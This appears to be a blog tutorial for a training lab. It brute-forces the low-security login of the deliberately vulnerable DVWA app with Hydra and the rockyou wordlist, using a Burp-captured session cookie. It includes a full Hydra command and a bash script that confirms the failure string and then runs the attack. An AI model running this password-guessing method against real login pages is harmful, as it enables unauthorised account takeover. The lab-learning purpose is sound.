Today's post is a quick example of brute forcing the low-security login form on the DVWA machine with Hydra.
You will need:
- Kali Linux
- Hydra
- DVWA
- Burp Suite
- Wordlist
First we need to capture the login request with Burp. That gives us the session cookie, and the response shows us exactly what the page returns on a "Failed Login", which is the string Hydra will key on.
Fire up Burp and capture the request
This is all we need from Burp: it gives us the parameter names, the URL and the cookie for the attack.
Next let's use Hydra. Open a terminal and type the following command. Make sure the URL and the failure string are exactly right, including case: if a response never contains the failure string (wrong path, wrong case, or an expired session cookie), Hydra treats every attempt as a success and you get false positives. The PHPSESSID value is the one from your own Burp capture, not the one shown here.
hydra 10.0.1.5 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rf0uoeqqtio083hl4opmmq2j57"
Execute the command and you will start seeing responses. If you added verbose mode (-v) each attempt is printed; once a password is found, Hydra prints the login information highlighted in green.
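The steps above rely on the failure string matching the page byte for byte. The script below is an added example (not from the original post) that confirms the exact DVWA failure text with one deliberately wrong login before building the Hydra command from the captured pieces. The target IP, the PHPSESSID value and the wordlist path are assumptions taken from the command above; replace them with your own Burp capture.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Confirms the exact DVWA
# "failed login" text before it goes into the Hydra command, because the
# failure string must match the response exactly or Hydra reports false
# positives. Target IP, session cookie and wordlist path are assumptions;
# replace them with the values captured in Burp.
set -u

TARGET="${TARGET:-10.0.1.5}"
FORM_PATH="/vulnerabilities/brute/"
PHPSESSID="${PHPSESSID:-rf0uoeqqtio083hl4opmmq2j57}"   # from the Burp capture
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"
COOKIE="security=low; PHPSESSID=${PHPSESSID}"

# DVWA's low-security brute force page prints its error inside <pre> tags
# (with a leading <br />). Return whatever sits between those tags so the
# string handed to Hydra is the real one, whatever its exact wording/case.
extract_failure_msg() {
  printf '%s\n' "$1" \
    | sed -n 's|<br */>||g; s|.*<pre>\([^<]*\)</pre>.*|\1|p' \
    | head -n 1
}

# Send one deliberately wrong login with the captured cookie, return the body.
fetch_failed_login() {
  curl -s --max-time 10 -b "$COOKIE" \
    "http://${TARGET}${FORM_PATH}?username=admin&password=definitely-wrong&Login=Login"
}

# Build the Hydra command line from the captured pieces. The third field is
# the failure string (no S= prefix, so Hydra treats it as "login failed");
# H= adds the Cookie header. A colon inside a header value would need to be
# escaped as \: but this cookie value contains none.
build_hydra_cmd() {
  failure_msg="$1"
  printf 'hydra -l admin -P %s -f -v %s http-get-form "%s:username=^USER^&password=^PASS^&Login=Login:%s:H=Cookie: %s"\n' \
    "$WORDLIST" "$TARGET" "$FORM_PATH" "$failure_msg" "$COOKIE"
}

main() {
  body="$(fetch_failed_login)"
  msg="$(extract_failure_msg "$body")"
  if [ -z "$msg" ]; then
    echo "No <pre> failure message found: check that security=low and the PHPSESSID is still valid" >&2
    return 1
  fi
  echo "Failure string: $msg"
  cmd="$(build_hydra_cmd "$msg")"
  echo "Running: $cmd"
  eval "$cmd"
}

# Only attack when explicitly asked:  ./dvwa-hydra.sh run
if [ "${1:-}" = "run" ]; then
  main
fi
```

If the script reports no failure message, fix the cookie before touching Hydra: an expired session redirects to the login page, which never contains the failure string, and that is exactly the situation that makes Hydra flag every password as correct.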
That is it for Low Security!